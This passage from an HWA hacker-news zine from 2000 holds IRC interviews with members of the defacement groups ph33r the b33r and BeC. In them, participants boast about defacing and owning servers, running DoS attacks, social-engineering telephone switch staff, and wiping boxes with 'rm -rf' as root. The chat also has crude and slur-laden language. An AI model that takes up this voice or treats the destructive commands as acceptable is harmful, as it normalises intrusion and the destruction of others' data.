       [21:44] <SugarKing> he talks about computers in general
       [21:44] *** Da_Pest has quit IRC (Quit: Hey!  Where'd my controlling terminal go?)
       [21:44] <SugarKing> aight
       [21:45] *** Da_Pest (****@********.***) has joined #vivalaresistance
       [21:45] <Da_Pest> Back!
       [21:46] <SugarKing> ok
       [21:46] <SugarKing> where the hell is p4ntera?
       [21:46] <Da_Pest> He walking his damn dog
       [21:46] <SugarKing> i'll kill it
       [21:46] <Da_Pest> Sorry bout the wait
       [21:46] <Da_Pest> LoL
       [21:46] <Da_Pest> he should be here soon
       [21:47] <SugarKing> ok
       [21:47] <Da_Pest> sorry for the wait
       [21:47] <SugarKing> np
       [21:48] <Da_Pest> do u code?
       [21:48] <SugarKing> yup
       [21:48] <SugarKing> btw, to set the record, since i'm logging and it's going to be posted
       [21:48] <SugarKing> I left this group because it was only defacing
       [21:49] <SugarKing> I didn't want to do it no more
       [21:49] <Da_Pest> Ok...
       [21:49] <SugarKing> I'll keep my opinion about defacing to myself
       [21:49] <Da_Pest> Why not?
       [21:49] <SugarKing> but, I'd rather code some nasty shit:)
       [21:49] <Da_Pest> ok gitcha
       [21:49] <Da_Pest> Alot of people dont like defacing
       [21:50] <Da_Pest> But the way I see it...
       [21:50] <SugarKing> I don't see a need for it
       [21:50] <Da_Pest> If you work fucking hard on a tight ass OBSD server and you been workin on it forever then I think you deserve the credit and so people can see your work
       [21:51] *** p4ntera (****@****.*********.******.***.***) has joined #vivalaresistance
       [21:51] <SugarKing> wb
       [21:51] <SugarKing> dog walker:P
       [21:51] <p4ntera> thanks
       [21:51] <p4ntera> sorry about that
       [21:51] <p4ntera> hah
       [21:51] <Da_Pest> Yah wb
       [21:51] <p4ntera> yeah man your mom is rough with the leash
       [21:51] <p4ntera> she keeps on bitin git
       [21:51] <Da_Pest> loil
       [21:51] <p4ntera> *biting it
       [21:51] <SugarKing> anyways
       [21:51] <p4ntera> =)
       [21:51] <SugarKing> back to the question
       [21:51] <SugarKing>  do you guys plan on ever stop defacing?
       [21:51] <p4ntera> yeah anyways
       [21:51] <p4ntera> maybe
       [21:51] <p4ntera> when some of us gets booked
       [21:52] <p4ntera> or we own the world
       [21:52] <Da_Pest> LoL
       [21:52] <p4ntera> which ever one comes first
       [21:52] <SugarKing> heh
       [21:52] <Da_Pest> Me never I wont stop
       [21:52] <p4ntera> yeah he well
       [21:52] <p4ntera> *will
       [21:52] <Da_Pest> I enjoy it
       [21:52] <p4ntera> i would just like to add something?
       [21:52] <p4ntera> if thats alright?
       [21:52] <SugarKing> go ahead
       [21:52] <SugarKing> you got the floor:)
       [21:52] <Da_Pest> I will never stop hax0ring and if i do good work thhen I believe it should not go unnoticed
       [21:52] <p4ntera> you asked whats with the "underground aint dead part"
       [21:52] <SugarKing> ya
       [21:52] <p4ntera> well
       [21:52] <p4ntera> if u noticed last year
       [21:53] <p4ntera> groups like gH,irc.psychic.com and h4g15 were defacing major websites
       [21:53] <SugarKing> ya
       [21:53] <p4ntera> showing there weak security
       [21:53] <p4ntera> now we got people like "crime boys" and artech defacing websites
       [21:53] <Da_Pest> Exactly
       [21:53] <p4ntera> and these are the people that will protect potentially high up websites?
       [21:53] <p4ntera> i dont want my bank card protected by these frontpage kiddies
       [21:54] <Da_Pest> Ok course
       [21:54] <p4ntera> u know what i mean?
       [21:54] <SugarKing> yah
       [21:54] <Da_Pest> and the sad part is alot of admins are like that
       [21:54] <SugarKing> true in a sense
       [21:54] <p4ntera> yeah thats right they are
       [21:54] <Da_Pest> And i mean alot
       [21:54] <SugarKing> but what about groups like L0pht, who made their fame without defacing?
       [21:54] <p4ntera> well
       [21:54] <p4ntera> they were made in the 80's
       [21:54] <Da_Pest> Like look at all of artechs for god sakes
       [21:54] <p4ntera> when defacing was unheard of
       [21:55] <p4ntera> bbs hacking
       [21:55] <SugarKing> what about now?
       [21:55] <p4ntera> they did do the potentially "dark" side of hacking
       [21:55] <SugarKing> they could easily deface now
       [21:55] <p4ntera> yeah but they outgrown that
       [21:55] <p4ntera> its kind of a teenage thing
       [21:55] <SugarKing> so you saying you're gonna outgrow it?
       [21:55] <p4ntera> fuck when i heard mosthated was 19 i was shocked
       [21:55] <p4ntera> eventually
       [21:55] <SugarKing> heh
       [21:55] <SugarKing> ya
       [21:56] <Da_Pest> I dont think I will
       [21:56] <Da_Pest> until i get booked
       [21:56] <p4ntera> yeah he will
       [21:56] <p4ntera> heh
       [21:56] <p4ntera> anyways
       [21:56] <Da_Pest> Umm...
       [21:56] <Da_Pest> No
       [21:56] <SugarKing> in my last interview (team echo) one member said (remain nameless) hacking is something that just eventually progresses
       [21:56] <p4ntera> yeah
       [21:56] <SugarKing> which is true
       [21:56] <p4ntera> funny thing is
       [21:56] <Da_Pest> Tru dat
       [21:56] <p4ntera> we have 2 members of team echo
       [21:56] <p4ntera> in our group
       [21:56] <p4ntera> nameless of course
       [21:56] <SugarKing> ya I know
       [21:56] <Da_Pest> hehe =)
       [21:56] <p4ntera> well, had
       [21:56] <SugarKing> had?
       [21:56] <p4ntera> one got booked
       [21:56] <SugarKing> they left?
       [21:57] <SugarKing> who?
       [21:57] <p4ntera> another one is still in
       [21:57] <p4ntera> Analognet
       [21:57] <SugarKing> Analognet was in ph33r the b33r?
       [21:57] <p4ntera> yep
       [21:57] <Da_Pest> :)
       [21:57] <p4ntera> dont be so shocked
       [21:57] <SugarKing> i didn't know
       [21:57] <p4ntera> u know who taught him how to hack nt?
       [21:57] <p4ntera> your talking to him right now
       [21:57] <SugarKing> heh
       [21:57] <p4ntera> he learned very fast
       [21:57] <Da_Pest> p4ntera is truly 1337 sh1t lol
       [21:57] <p4ntera> within a month he knew what i knew
       [21:57] <Da_Pest> He taught me alot
       [21:58] <p4ntera> and became a nt admin
       [21:58] <p4ntera> damn right negro
       [21:58] <SugarKing> cool
       [21:58] <p4ntera> =)
       [21:58] <Da_Pest> I think as a group we are progressing
       [21:58] <p4ntera> i totally agree
       [21:58] <p4ntera> 100%
       [21:58] <SugarKing> so anything we should know about with the future of ph33r the b33r?
       [21:58] <p4ntera> yeah
       [21:58] <Da_Pest> We are slowly moving are way up to bigger and better things
       [21:58] <p4ntera> we are going to  be big
       [21:58] <p4ntera> as da_pest is saying
       [21:59] <Da_Pest> And eventually we are gonna pull a gH and own a big ass site
       [21:59] <p4ntera> we are the only thing that comes close to a good group
       [21:59] <p4ntera> of course
       [21:59] <Da_Pest> And that will be a grand finale
       [21:59] <p4ntera> my boys wkD are there with us
       [21:59] <Da_Pest> Yah
       [21:59] <SugarKing> oh yeah also...don't you think it's dangerous by just randomly pulling in people in the group who could possible be a fed?
       [21:59] <p4ntera> werd ka0x and BlazinWeed =)
       [21:59] <p4ntera> no
       [21:59] <p4ntera> i know my rights
       [21:59] <p4ntera> too well in fact
       [21:59] <Da_Pest> Same
       [21:59] <p4ntera> entrapment is a beautifal thing my friend
       [21:59] <p4ntera> =)
       [22:00] <Da_Pest> Plus we make sure people are legit before they join
       [22:00] <p4ntera> and thats why we hang on lame networks
       [22:00] <SugarKing> any last comments? shout out's? flames?
       [22:00] <p4ntera> cause efnet is like 98% sniffed
       [22:00] <p4ntera> well
       [22:00] <p4ntera> i would like to say to sinfony, aka john dough
       [22:00] <Da_Pest> lol
       [22:00] <Da_Pest> DIE
       [22:00] <p4ntera> that i respect his skills
       [22:00] <p4ntera> i recently found out he is r3p3nt from dhc, which kinda sucks for me
       [22:00] <p4ntera> because i respect dhc as a group
       [22:00] <p4ntera> and him especially
       [22:01] <p4ntera> even though he flamed us
       [22:01] <p4ntera> he has his skills
       [22:01] <p4ntera> but he is still a ass
       [22:01] <p4ntera> that will likely never change
       [22:01] <Da_Pest> hehe :)
       [22:01] <SugarKing> heh
       [22:01] <SugarKing> anything from you, Pest?
       [22:01] <Da_Pest> He is  a bigger ass then m4rth4 lol
       [22:01] <Da_Pest> Yah i just gotta say look out bitches cause PTB Is climbing our way up
       [22:01] <p4ntera> heh
       [22:02] <Da_Pest> And soon we will not be able to be touched
       [22:02] <p4ntera> i would like to say some more as well
       [22:02] <p4ntera> that is right
       [22:02] <p4ntera> these 3rd world countries are our playgrounds
       [22:02] <p4ntera> once we master our abilities, we are coming for the higher ups
       [22:02] <Da_Pest> Yah
       [22:02] <SugarKing> that it?:)
       [22:02] <p4ntera> once we recruit some more members, we are coming
       [22:02] <p4ntera> you cannot stop it
       [22:02] <p4ntera> no one can =)
       [22:02] <Da_Pest> Oh Yah
       [22:03] <p4ntera> and
       [22:03] <p4ntera> i would like to say
       [22:03] <p4ntera> Sugarking is one sexy cum muffin
       [22:03] <p4ntera> =)
       [22:03] <SugarKing> hahah
       [22:03] <SugarKing> thanks for the interview d00dz
       [22:03] <SugarKing> ok
       [22:03] <p4ntera> heh
       [22:04] *** Da_Pest has quit IRC (Quit: Hey!  Where'd my controlling terminal go?)
       Session Close: Thu May 04 22:04:39 2000
      
       END
       
       @HWA
       
       
327.1 [HWA] Interview: BeC some oldskewl muscle makes some noise.(additional feature)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Interview with BeC by Cruciphux Oct 2000     
      
      This is an interview with kR_d of the fledgling hacking outfit known
      only as BeC (Binary Equipment Corporation) based on DeC since that
      machine was prevelant in the move Takedown (not released here in Canada
      at this time).
      
      It was conducted across a few days in parts and assembled here with the
      lesser interesting parts and chit-chat removed.
      
      One site recently (and curiously STILL defaced) by BeC was the quantum
      physics lab (?) at wesleyan edu.: http://quantum.phys.wesleyan.edu/
      As far as I know it has not been listed on Attrition nor even noticed
      apparently by the admins, some other sites were also hit with a similar
      defacement but as our interviewee tells us BeC is not all about defacing.
      
      
      Interviewed : Kr_D (BeC) Kr_D is a pseudonym since others use his usual nick on
                    irc we altered it for this interview to avoid any confusion.
      Conducted by: Cruciphux
      (Informal)
      
      http://hwa-security.net/BeC.txt
      
            
      Old school ascii art from the quantum hack:
      
      
      []-=-=_===--=-=--=w00f,-=--=-aND=--=--=_-=gr33tinGs=--=--=-fR0m----=--__=--=-=[]
      
      
      
      
      
                                            
                                                                 
                      ..                                        
                       R                                .yHJ^*^  
                       H                   _._       .C^'                _._    
                       `#                cYk"^%Hn    KH                :TGTH)
                        U,             .C"      .U   HD:         .    ####$$&'
                         K    _        KD_,,n#^^"'    CD,       d'     ""^#"'
                         H  b^^ccn,    #L^'"       .   "KGg,oY^"
                         J#^'    `:5   CD.     _,S'                  
                       o&HD:       cH   "KKg,oP^"                       
                     ,h'  ^K      .k"                              
                           KD.  .gh'                             [ KrD ]          
                            Hysdp'                    
                        ,uY#L^"                                        
                                                  .-[m0FF]                     
                                                  |     
                                           [m0FF]-'
                        
                        
      
      
                        
      []-=-===--=-=tH3--=_-=--=b1n4Ry--=--=eQUiPM3n7-=_-=--=-=-=cO0PERA7i0n=--_--=-=[] 
      
      /SNIP/
      
      
      Session Start: Sat Oct 28 17:05:18 2000
      [17:05] *** Now talking in #INTERVIEW_BeC
      [] Channel [ #INTERVIEW_BeC ] Modes [ + ]
      [17:05] -> *Kr_D* hey
      [17:06] *** Kr_D (~k0rrupt@213.x.x.x) has joined #INTERVIEW_BeC
      [17:06] <Kr_D> hell0w stevie
      [17:06] *** [HWA] sets mode: +k werebizzy
      [17:06] <[HWA]> hewo
      [17:06] <Kr_D> heh
      [17:06] <[HWA]> how are you today?
      [17:06] <[HWA]> lets interview
      [17:06] <[HWA]> :)
      [17:07] <Kr_D> i am very fine indeed
      [17:07] <Kr_D> xept for all thos P-H-O-C-K-E-N
      [17:07] <[HWA]> firstly i heard you had sex with animals when you were young is this true?
      [17:07] <Kr_D> tcpwrapped boxes
      [17:07] <[HWA]> just kidding
      [17:07] <[HWA]> lol
      [17:07] <Kr_D> everywere
      [17:07] <Kr_D> it's true
      [17:07] <Kr_D> how did you know?
      [17:07] <[HWA]> ok seriously
      [17:07] <[HWA]> hehe
      [17:07] <Kr_D> ok
      [17:07] <[HWA]> first why don't you introduce yourself
      [17:08] <Kr_D> Hi, my name is KrD
      [17:08] <Kr_D> and i'm a crackinga ddict
      [17:08] <[HWA]> then i'll get into questions
      [17:08] <Kr_D> addict even
      [17:08] <[HWA]> as opposed to a crack addict
      [17:08] <[HWA]> good
      [17:08] <[HWA]> <i'll edit this>
      [17:08] <[HWA]> what have you cracked recently?
      [17:08] <Kr_D> like, erm.. 
      [17:08] <Kr_D> distort it = edit?
      [17:08] <[HWA]> what nick shall i use for the interview?
      [17:08] <Kr_D> Kr_D
      [17:08] <[HWA]> no as in take out silly chatter
      [17:09] <[HWA]> no distortion
      [17:09] <Kr_D> sed -e 's/Kr_D/KrD;w chat.txt' 
      [17:09] <[HWA]> you want to see the copy before it is released?
      [17:09] <Kr_D> sure
      [17:09] <[HWA]> that is perfectly acceptable.
      [17:09] <Kr_D> so, no #phrack editing shit
      [17:09] <Kr_D> with evil comments
      [17:09] <[HWA]> no
      [17:09] <Kr_D> and "tounting"
      [17:09] <[HWA]> no comments
      [17:09] <Kr_D> (i like that word)
      [17:09] <[HWA]> tounting? is that like taunting only obfuscated?
      [17:10] <Kr_D> yeah
      [17:10] <[HWA]> whats your opinion of Phrack? do u hang in their channel #phrack on EFNet?
      [17:10] <Kr_D> sometimes
      [17:10] <Kr_D> i like phrack
      [17:10] <Kr_D> they don't like me thou
      [17:10] <[HWA]> why is that?
      [17:11] DNS: 213.x.x.x
      [17:11] <Kr_D> dono
      [17:11] <Kr_D> do they like anyone?
      [17:11] <[HWA]> they certainly don't tolerate vhosts they seem to have now sense of humour
      [17:11] <Kr_D> heh
      [17:11] <[HWA]> my take is they are elitist ego trippers.
      [17:11] <Kr_D> they have humor
      [17:11] <[HWA]> comment?
      [17:11] <Kr_D> sarcastic humor
      [17:11] <[HWA]> yes i laugh at them often
      [17:11] <Kr_D> they are to eleet fro them selfes
      [17:11] <Kr_D> they really are eleet
      [17:11] <[HWA]> Phrack isn't the same since Bloodaxe left
      [17:11] <Kr_D> but, it's like when,
      [17:11] <Kr_D> er,..
      [17:12] <Kr_D> yeah, like britney spears
      [17:12] <[HWA]> Chris Goggins
      [17:12] <Kr_D> look at her before she got famous
      [17:12] <Kr_D> and look at her now
      [17:12] <Kr_D> she has become more rude and stuff
      [17:12] <[HWA]> i didn't know of her before she was famous
      [17:12] <Kr_D> she thinks she is better then other
      [17:12] <[HWA]> have you defaced her?
      [17:12] <[HWA]> :)
      [17:12] <Kr_D> i have defaced her but with something else
      [17:12] <Kr_D> heh
      [17:13] <[HWA]> honestly i wouldn't mind finding a local root compromise to that snatch
      [17:13] <Kr_D> i mean, like two years ago
      [17:13] <[HWA]> but i digress
      [17:14] <Kr_D> heh
      [17:15] <[HWA]> hrm
      [17:15] <Kr_D> ok, 
      [17:15] <[HWA]> what have you cracked recently that is of import and what if any group are you affiliating with?
      [17:15] * [HWA] trys to steer back on track
      [17:16] <[HWA]> tries even
      [17:16] <Kr_D> of import 
      [17:16] <Kr_D> hmmss..
      [17:16] <[HWA]> well any then.
      [17:16] <Kr_D> heh
      [17:16] <[HWA]> what was you last crack
      [17:16] <[HWA]> not girl i mean site hack
      [17:16] <[HWA]> lol
      [17:16] <Kr_D> ah
      [17:17] *** [HWA] sets mode: +o Kr_D
      [17:17] <Kr_D> *.*.???okyo.??.jp
      [17:17] <Kr_D> my favourite is *.???.xx.jp
      [17:17] <[HWA]> what OS was it running on? i note the iis in there and think NT but ...
      [17:17] <Kr_D> it rules
      [17:17] <Kr_D> they are running al lil' bit of everything
      [17:17] <Kr_D> NT / SOlaris / IRIX / HP-UX / BSDI / RH6.2
      [17:17] <Kr_D> blah blah blah
      [17:18] <[HWA]> well what OS was the box you owned running? do you target any particular OS or what
      [17:18] <[HWA]> do you use other peoples scripts or write your own exploits/find your own holes?
      [17:18] <Kr_D> rome is running Solaris
      [17:18] <Kr_D> heh
      [17:18] <Kr_D> it depends
      [17:18] <[HWA]> did you back door them or just do hit and run hacks?
      [17:19] <Kr_D> i own them
      [17:19] <Kr_D> i don't deface usually
      [17:19] <[HWA]> do you use the boxes for DoSing? ie: install trinoo or anything on these boxes?
      [17:19] <Kr_D> i have defaced two sites this week even
      [17:19] <Kr_D> (for u)
      [17:19] <Kr_D> heh
      [17:19] <[HWA]> don't say that
      [17:19] <[HWA]> be more general
      [17:19] <Kr_D> haha
      [17:19] <[HWA]> for media attention
      [17:19] <Kr_D> DoSing is so lame
      [17:19] <[HWA]> =)
      [17:20] <[HWA]> yes but it is still very prevalent on the net, so you never packet?
      [17:20] <[HWA]> have you EVER packetted anyone?
      [17:20] <Kr_D> i packet when i want a channel
      [17:20] <[HWA]> I have in my early days.
      [17:20] <Kr_D> or when i need to get something down to be able to spoof it
      [17:20] <[HWA]> but DoSing commercial sites etc then is lame?
      [17:20] <Kr_D> 's ip
      [17:20] <[HWA]> ok
      [17:20] <[HWA]> makes sense
      [17:20] <Kr_D> i did it once, to try
      [17:21] <[HWA]> whats your opinion of say, mafiaboy?
      [17:21] <Kr_D> i DoS regulary to get bot's away
      [17:21] <Kr_D> heh
      [17:21] <Kr_D> but when i dos
      [17:21] <Kr_D> i use my own tools
      [17:21] <Kr_D> make it a lil' more eleet
      [17:21] <[HWA]> what do you think of last sunday's 0wn4ge of EFnet?
      [17:21] <Kr_D> i didnt notice ity
      [17:21] <[HWA]> by Z----- and GG-----
      [17:22] <Kr_D> heh
      [17:22] <Kr_D> it's lame
      [17:22] <Kr_D> really lame
      [17:22] <[HWA]> it happened sunday morning
      [17:22] <Kr_D> there's no meaning at all to destroy stuff
      [17:22] <[HWA]> they did it to protest mafiaboy and shadowknight's incarceration
      [17:22] <Kr_D> if i crash a box, it's because i hate the admin
      [17:22] <Kr_D> who is that mafia boy?
      [17:23] <Kr_D> i read a lil about him in hwa.hax0r.news
      [17:23] <[HWA]> how do you crash the box? forkbombs or something more destructive
      [17:23] <Kr_D> ./own.sh
      [17:23] <Kr_D> and when your root on the box
      [17:23] <[HWA]> he took out some major sites like yahoo.com and i think cnn.com using mstream
      [17:23] <Kr_D> rm -rf
      [17:23] <Kr_D> heh
      [17:23] <Kr_D> i don't like packed kiddies
      [17:23] <Kr_D> or IRCWarriors(tm)
      [17:23] <[HWA]> m_____ came up with the idea for mstream, its loosely based on tfn2k
      [17:24] <Kr_D> it's nicer to have yahoo.com
      [17:24] <Kr_D> then having crashed it
      [17:24] <[HWA]> when you deface a site do you have a message or is it just for the sake of recognition?
      [17:24] <[HWA]> what name are you trying to get out to the people?
      [17:24] <[HWA]> and why?
      [17:24] <Kr_D> its for recognition
      [17:24] <Kr_D> BeC
      [17:24] <[HWA]> are you worried about being busted?
      [17:24] <Kr_D> The binary equipment corporation
      [17:24] <Kr_D> yes
      [17:24] <[HWA]> you are in Sweden correct?
      [17:25] <Kr_D> of cause i am
      [17:25] <Kr_D> NO
      [17:25] <Kr_D> WHO THE PHUCK SAID THAT
      [17:25] <Kr_D> heh
      [17:25] <Kr_D> i'm from scandinavia
      [17:25] <[HWA]> maybe i'm conf00zed
      [17:25] <[HWA]> ah ok
      [17:25] <Kr_D> thats all you need to know
      [17:25] <[HWA]> good nuff
      [17:25] <Kr_D> muff muff
      [17:25] <[HWA]> the point was what are the computer laws like in your country?
      [17:25] <Kr_D> mean ones
      [17:26] <[HWA]> aside: how do you say greetings and props in scandanavian?
      [17:26] <Kr_D> thy shalt not 0wn(r) #phrack 0x7d0-0x7d9
      [17:26] <Kr_D> computahz
      [17:26] <[HWA]> aside: teach me some werdz
      [17:26] <Kr_D> i usually say: "hellauw"
      [17:26] <[HWA]> the laws are stringent then like the U.S
      [17:26] <Kr_D> or "hi"
      [17:26] <[HWA]> haha
      [17:27] <[HWA]> hi? thats a strange word
      [17:27] <Kr_D> yeah
      [17:27] <[HWA]> here we say garshnuggeen 
      [17:27] <[HWA]> rofl
      [17:27] <Kr_D> okey
      [17:27] <[HWA]> are u a smartass would you say?
      [17:27] <Kr_D> a smartass
      [17:27] <[HWA]> <dont worry i'll take out the silly bits>
      [17:27] <Kr_D> smartass = unknown calss
      [17:28] <Kr_D> (it rythmes, whoii)
      [17:28] <[HWA]> do you have a message for the scene or general netizens?
      [17:28] <Kr_D> class even
      [17:28] <[HWA]> nod
      [17:28] <Kr_D> BeC is god?
      [17:28] <[HWA]> ok
      [17:28] <Kr_D> good even
      [17:28] <Kr_D> heh
      [17:28] <[HWA]> and why did you choose 'BeC' as the group name?
      [17:28] <[HWA]> there is a story behind it no?
      [17:28] <Kr_D> i saw it in a movie 
      [17:28] <Kr_D> "takedown operation"
      [17:28] <[HWA]> which movie
      [17:29] <[HWA]> i haven't seen that, the mitnick movie? 
      [17:29] <Kr_D> it's based upon mitnicks lil adventures
      [17:29] <[HWA]> its not released in North America yet
      [17:29] <Kr_D> back in the 90;s
      [17:29] <Kr_D> they can't use DEC for (c) reasons
      [17:29] <[HWA]> they have no release date either, computers show no street date.
      [17:29] <Kr_D> so they choosed to call DEC BEC
      [17:29] <Kr_D> digital -> binary
      [17:29] <Kr_D> heh
      [17:29] <Kr_D> it sounded nice
      [17:29] <[HWA]> nod
      [17:29] <Kr_D> nope
      [17:29] <Kr_D> it's been out for many months
      [17:29] <[HWA]> if you see it let me know
      [17:30] <[HWA]> yes but not here
      [17:30] <Kr_D> ok
      [17:30] <[HWA]> it was released in France i believe at a film festival
      [17:30] <[HWA]> do you code?
      [17:30] <Kr_D> an yur from?
      [17:30] <Kr_D> i code
      [17:30] <[HWA]> I'm from England i'm located in Canada presently.
      [17:31] <[HWA]> :)
      [17:31] <Kr_D> heh
      [17:31] <[HWA]> how long have you been on the net, did you ever BBS?
      [17:31] <[HWA]> did you ever run a BBS?
      [17:31] <Kr_D> i'v been on the net since 96
      [17:31] <Kr_D> i still BBS
      [17:31] <[HWA]> how old are you?
      [17:31] <[HWA]> do you wardial?
      [17:31] <Kr_D> i'm 17
      [17:31] <Kr_D> soon 18
      [17:32] <Kr_D> no, i  \/\/4rd4yl
      [17:32] <[HWA]> how about telephone phun? do you phreak?
      [17:32] <Kr_D> i am a phreak
      [17:32] <Kr_D> and i phreak
      [17:32] <[HWA]> trunk seizing is phun
      [17:32] <Kr_D> i reverse enginered a ITU-T node
      [17:32] <[HWA]> what is the tone to seize a trunk in Scandinavia? its 2600 in the U.S and North America
      [17:32] <Kr_D> me and a friend drove up to the local switching station
      [17:33] <[HWA]> what did you do with it? this is the one located near ur house?
      [17:33] <Kr_D> it's two metres high and 40cm deep
      [17:33] <Kr_D> i have it right behind me
      [17:33] <Kr_D> to watch
      [17:33] <Kr_D> heh :)
      [17:33] <Kr_D> i love phones
      [17:33] <Kr_D> i have done so much shit with phones
      [17:34] <[HWA]> note: dear repairman this phone is out of service please replace it we need a new coin drop mechanism
      [17:34] <Kr_D> i can do whatever i want to whoever i want in seeden
      [17:34] <[HWA]> sweden?
      [17:34] <[HWA]> you own switches?
      [17:34] <Kr_D> darn
      [17:34] <Kr_D> oh yeah
      [17:34] <[HWA]> what is the tone you didn't answer
      [17:34] <[HWA]> 3144?
      [17:34] <Kr_D> huh?
      [17:34] <[HWA]> to seize a trunk
      [17:35] <[HWA]> its 2600hz in NA
      [17:35] <Kr_D> i don't do that phreaking stuff
      [17:35] <[HWA]> ah
      [17:35] <Kr_D> no b0xing technique
      [17:35] <[HWA]> how then do you own the equipment?
      [17:35] <Kr_D> i hax0rized them
      [17:35] <[HWA]> how do you access the internal networks?
      [17:35] <Kr_D> with my evil mind
      [17:35] <Kr_D> i find their "secret" number
      [17:35] <Kr_D> thsi si quite phun actually
      [17:35] <[HWA]> dialup and social engineering?
      [17:35] <Kr_D> they are smart them bastahs
      [17:36] <[HWA]> when you connect to the net what method do you use?
      [17:36] <Kr_D> you knwo taht there are numbers wich costs liek "2" a minute to call
      [17:36] <[HWA]> do u connect direct from home?
      [17:36] <[HWA]> nod
      [17:36] <Kr_D> they have all their evil stuff on such numbers
      [17:36] <Kr_D> where noone wardial
      [17:36] <[HWA]> aha
      [17:36] <Kr_D> but i found out
      [17:36] <[HWA]> so how do you find these without incurring charges?
      [17:36] <Kr_D> and by cheer luck
      [17:37] <Kr_D> i found a number with a kewl thing
      [17:37] <[HWA]> ?
      [17:37] <Kr_D> a support line of somekind
      [17:37] <Kr_D> i engineered them 
      [17:37] <[HWA]> its kinda vague
      [17:37] <Kr_D> they gave me a number to a support line for phoneswtiching troublke
      [17:37] <[HWA]> what is the software that controls the switches called?
      [17:37] <Kr_D> i called them up
      [17:37] <Kr_D> Local 7
      [17:37] <[HWA]> aka Cosmos
      [17:38] <[HWA]> what does it run on? 
      [17:38] <Kr_D> Local 7
      [17:38] <[HWA]> (just curious)
      [17:38] <[HWA]> do you know what the hardware is?
      [17:38] <Kr_D> ISDN switches from ericsson
      [17:38] <[HWA]> ericsson!
      [17:38] <Kr_D> they use ITU-T standard shyt
      [17:38] <Kr_D> (CCiTT-7)
      [17:39] <[HWA]> do you do conference calls?
      [17:39] <Kr_D> nope
      [17:39] <[HWA]> 'confs
      [17:39] <[HWA]> have you ever?
      [17:39] <Kr_D> noone wants to talk w/ me
      [17:39] <[HWA]> hrm what about prank calling
      [17:39] <Kr_D> i have back in 97
      [17:39] <Kr_D> i'v done that
      [17:39] <[HWA]> most phreaks seem to go thru a conf stage and prank calling stage
      [17:39] <Kr_D> i'v done alot with phones like i said
      [17:39] <[HWA]> some never grow out of it
      [17:40] <[HWA]> so you're 17 now you were how old when you started?
      [17:40] <[HWA]> 12
      [17:40] <Kr_D> 12
      [17:40] <Kr_D> when i was young and naive
      [17:40] <Kr_D> and evil
      [17:40] <Kr_D> i was after power, not knowledge
      [17:40] <[HWA]> what was your first home computer? or did you use school/elsewhere's equipment first?
      [17:40] <Kr_D> TSR 180
      [17:40] <[HWA]> like what got you into computers to begin with?
      [17:40] <Kr_D> my brothers box
      [17:40] <[HWA]> Wargames?
      [17:41] <[HWA]> :)
      [17:41] <Kr_D> i think it was 85
      [17:41] <Kr_D> 87 we got a c64
      [17:41] <[HWA]> did you play games or code straight away?
      [17:41] <Kr_D> and 89 an amiga 5000
      [17:41] <Kr_D> 500
      [17:41] <Kr_D> eveb
      [17:41] <Kr_D> i played alot
      [17:41] <[HWA]> pirated?
      [17:41] <Kr_D> yes
      [17:41] <Kr_D> i cracked codes
      [17:41] <Kr_D> for levels
      [17:42] <Kr_D> so i could finnish the game faster
      [17:42] <Kr_D> and stuff
      [17:42] <[HWA]> what about the games themselves, crack any copy protection?
      [17:42] <Kr_D> nope
      [17:42] <Kr_D> i support the amiga scene
      [17:42] <Kr_D> supported even
      [17:42] <[HWA]> did you ever get into the pirate scene at all, courier etc or anything ?
      [17:42] <Kr_D> no cracking of codes
      [17:42] <Kr_D> nope
      [17:42] <[HWA]> ok
      [17:42] <[HWA]> many do/did
      [17:43] <Kr_D> i was only interested in playing
      [17:43] <[HWA]> so you first got onto the internet in 1996?
      [17:43] <Kr_D> and controling the box
      [17:43] <[HWA]> what OS were you running then?
      [17:43] <Kr_D> no, that was in 95
      [17:43] <Kr_D> Windows 3.11
      [17:43] <Kr_D> from my school
      [17:43] <[HWA]> ok 1995. did you run ibm clone and windows?
      [17:43] <[HWA]> what OS do you run now?
      [17:43] <[HWA]> Linux?
      [17:43] <Kr_D> i owned an amiga1200 then
      [17:44] <Kr_D> running Amiga OS 3.1
      [17:44] <Kr_D> i think
      [17:44] <[HWA]> Minix was available for the Amiga or Qnix
      [17:44] <Kr_D> and sucked
      [17:44] <[HWA]> I think there is even a linux for Amiga, not sure
      [17:44] <[HWA]> possibly coherent also
      [17:44] <Kr_D> tehre are many
      [17:44] <[HWA]> nod
      [17:44] <Kr_D> Turbo/falcon/redhat
      [17:44] <[HWA]> do you use a unix variety now though?
      [17:44] <[HWA]> or still use windows mainly?
      [17:44] <Kr_D> i only use unix
      [17:45] <[HWA]> which flavour?
      [17:45] <Kr_D> i HATE windows
      [17:45] <Kr_D> and will never use it
      [17:45] <[HWA]> what about X Windowss
      [17:45] <Kr_D> solaris/FreeBSD
      [17:45] <[HWA]> -s
      [17:45] <Kr_D> CDE
      [17:45] <[HWA]> whats CDE? i should probably know but i'm blank on it 
      [17:45] <Kr_D> Cumm0nd3zk70p env4yr0m3n7
      [17:45] <[HWA]> ah yea
      [17:45] <[HWA]> ok
      [17:45] <Kr_D> it's HP's/SGI's/Sun's own version of MWM
      [17:46] <Kr_D> looks and feels like mwm
      [17:46] <[HWA]> what do you want BeC to do, what is BeC planning to do in the future?
      [17:46] <Kr_D> i want to "be nauhty at tsutomus sight"
      [17:46] <Kr_D> by owning ariel.sdsc.edu
      [17:46] <Kr_D> and not letting him access it
      [17:46] <[HWA]> are you interested in computer security as a possible area of work or do you work in compsec at any level now? 
      [17:47] <Kr_D> heh
      [17:47] <[HWA]> why target shimomura, because he owned mitnick?
      [17:47] <Kr_D> i think i'll prolly end up working as a unix admin somewhere
      [17:47] <Kr_D> he did it for the money
      [17:47] <[HWA]> is mitnick an idol of yours?
      [17:47] <Kr_D> i like his style
      [17:47] <[HWA]> yes and the fame
      [17:47] <Kr_D> he didnt do anything special 
      [17:47] <Kr_D> but he did alot
      [17:47] <[HWA]> mitnick is a net/phreak addict
      [17:47] <Kr_D> like, back in teh 80;s
      [17:51] *** Disconnected
      [18:00] *** Rejoined channel #INTERVIEW_BeC
      [] Channel [ #INTERVIEW_BeC ] Modes [ +k ]
      [18:00] <[HWA]> [17:48] <[HWA]> do you have any experience with radios like mitnick (and myself) do? ie:ham gear?
      [18:00] <[HWA]> [17:48] <[HWA]> example: packet radio or 2m/440cm repeaters etc 
      [18:00] <[HWA]> [17:48] <[HWA]> licensed or not.
